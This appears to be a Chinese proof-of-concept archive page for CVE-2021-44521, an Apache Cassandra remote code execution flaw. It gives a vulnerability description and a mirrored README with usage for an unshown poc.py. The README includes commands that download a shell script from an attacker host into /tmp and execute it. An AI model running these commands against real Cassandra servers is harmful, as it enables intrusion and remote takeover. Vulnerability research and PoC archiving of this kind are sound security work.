关联漏洞
标题:Apache Cassandra 代码注入漏洞 (CVE-2021-44521)Description:Apache Cassandra是美国阿帕奇(Apache)基金会的一个分布式Nosql数据库。Cassandra是一个混合型的非关系的数据库,类似于Google的BigTable。其主要功能比Dynamo (分布式的Key-Value存储系统)更丰富,但支持度却不如文档存储MongoDB(介于关系数据库和非关系数据库之间的开源产品,是非关系数据库当中功能最丰富,最像关系数据库的。 Apache Cassandra 存在代码注入漏洞,该漏洞源于在特定配置下攻击者有可能在主机上执行任意代码。攻击者需要有足够
Description
Automated PoC of CVE-2021-44521
介绍
# CVE-2021-44521
Automated PoC of CVE-2021-44521
Credits to original poc: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
# Requirements
Cassandra-driver
```bash
pip3 install cassandra-driver
```
# Usage
```bash
python3 poc.py <ip> <cmd>
```
Note that you can't do more command at a time, neither use pipes as of yet.
So run
```bash
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"
```
文件快照
[4.0K] /data/pocs/6743eefaa24e1cb623287a1d6b8a6320918afc46
├── [1.7K] poc.py
└── [ 556] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。